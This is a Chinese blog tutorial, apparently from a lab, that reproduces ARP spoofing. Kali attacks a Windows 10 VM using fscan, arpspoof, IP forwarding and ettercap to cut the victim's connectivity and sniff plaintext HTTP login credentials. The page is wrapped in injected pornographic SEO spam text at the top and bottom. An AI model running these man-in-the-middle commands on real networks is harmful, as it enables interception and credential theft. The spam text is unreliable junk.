<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      kali復現arp欺騙

      利用kali復現arp欺騙

      本實驗旨在幫助學習者理解 ARP 協議工作機制 以及 常見的ARP欺騙攻擊原理與防護方法,僅限于 教學和實驗環境 使用。實驗過程中可能涉及到網絡抓包、ARP表修改、ARP欺騙等操作,這些操作在實際生產環境或公共網絡中使用可能會對他人網絡造成干擾或破壞。

      復現步驟

      開啟兩臺機器:kali、windows10

      image-20250926153041601

      確保兩個機器是同一個網卡,默認都是nat的vmnet8

      查看kali的IP地址(后面用fscan探測的就是kali所在的網絡):

      ip a
      

      image-20250926153350151

      kali查看網絡的網關:

      route -n
      

      image-20250926153455810

      kali利用fscan發現windows主機IP地址:

      ./FScan_2.0.1_linux_x64 -h kali所在的網段
      ./FScan_2.0.1_linux_x64 -h 192.168.198.0/24
      

      image-20250926153207923

      image-20250926153551378

      發現windows10主機的IP地址

      所以目前得到的信息是:

      + kali攻擊機:192.168.198.130
      + Windows受害主機:192.168.198.129
      + 網關:19.168.198.2
      

      斷網攻擊

      kali執行:

      sudo arpspoof -i kali查看網絡信息時候的網卡 -t 受害者IP地址 偽裝成的IP地址(網關)
      sudo arpspoof -i eth0 -t 192.168.198.129 192.168.198.2
      
      # 注意sudo需要root的密碼,也就是kali,并且輸入密碼不會顯示出來,輸入后直接回車就好了
      

      image-20250926154334900

      Windows查看arp表:

      arp -a
      

      發現網關的mac地址和kali的mac地址一樣,攻擊成功

      image-20250926154359100

      windows隨便訪問一個網站都是失敗的:

      image-20250926155029663

      kali執行arpspoof的終端按ctrl+C可以停止攻擊

      image-20250926154722372

      windows恢復正常

      image-20250926154734501

      可以訪問互聯網:

      image-20250926155051391

      抓取http明文信息(受害機器無感)

      kali需要開啟IP轉發功能

      sudo su
      # 輸入kali回車
      
      echo 1 > /proc/sys/net/ipv4/ip_forward
      iptables -A FORWARD -i eth0 -o eth0 -j ACCEPT
      iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
      

      image-20250926155353565

      kali執行arp攻擊

      arpspoof -i 網卡名 -t 受害者IP地址 -r 網關地址
      arpspoof -i eth0 -t 192.168.198.129 -r 192.168.198.2
      

      image-20250926155407682

      windows查看arp:

      image-20250926155427515

      攻擊成功,觀察是否可以上網:

      image-20250926155456875

      可以上網

      kali新開一個終端運行:

      sudo su
      # 輸入kali回車
      
      ettercap -Tq -i 網卡名
      ettercap -Tq -i eth0
      

      image-20250926155643819

      受害windows訪問:

      http://a.aixjt.com/AdminPublic.html
      

      實驗過程中如果發現windows又斷網了,需要你重新上面的ip轉發的操作就可以

      image-20250926155936853

      隨便輸入賬號密碼之后登錄,回到kali運行ettercap的終端:

      image-20250926160023565

      發現了受害者輸入的賬號密碼

      本實驗旨在幫助學習者理解 ARP 協議工作機制 以及 常見的ARP欺騙攻擊原理與防護方法,僅限于 教學和實驗環境 使用。實驗過程中可能涉及到網絡抓包、ARP表修改、ARP欺騙等操作,這些操作在實際生產環境或公共網絡中使用可能會對他人網絡造成干擾或破壞。

      posted @ 2025-09-26 16:02  初雪chuxue  閱讀(31)  評論(0)    收藏  舉報
      主站蜘蛛池模板: 色爱区综合激情五月激情| 国产午夜福利一区二区三区 | 少妇高潮喷潮久久久影院| 建始县| 广水市| 亚洲国产一区二区av| aaa少妇高潮大片免费看| 久久久久久久久久久国产| 熟女亚洲综合精品伊人久久 | 国产成人综合久久久久久| 无码h片在线观看网站| 精品人妻av综合一区二区| 午夜夜福利一区二区三区| 成人亚洲国产精品一区不卡| 国产无遮挡猛进猛出免费| 在线欧美中文字幕农村电影| 国产成人午夜福利在线播放| 亚洲久悠悠色悠在线播放| 久久美女夜夜骚骚免费视频| 中文字幕日韩有码一区| 亚洲午夜成人精品电影在线观看 | 国产三级a三级三级| 中文字字幕在线中文乱码| 亚洲激情视频一区二区三区| 99久久精品费精品国产一区二 | 成人免费无遮挡无码黄漫视频| 亚洲中文字幕国产精品| 深夜福利啪啪片| 国产AV影片麻豆精品传媒| 国产成人a在线观看视频| 中文字幕结果国产精品| 日本熟妇XXXX潮喷视频| 国产激情国产精品久久源| 99在线国内在线视频22| 人妻聚色窝窝人体WWW一区 | 风流老熟女一区二区三区| 成人亚洲av免费在线| 成人精品久久一区二区三区| 蜜臀久久综合一本av| 国产高清国产精品国产专区| 人人干人人噪人人摸|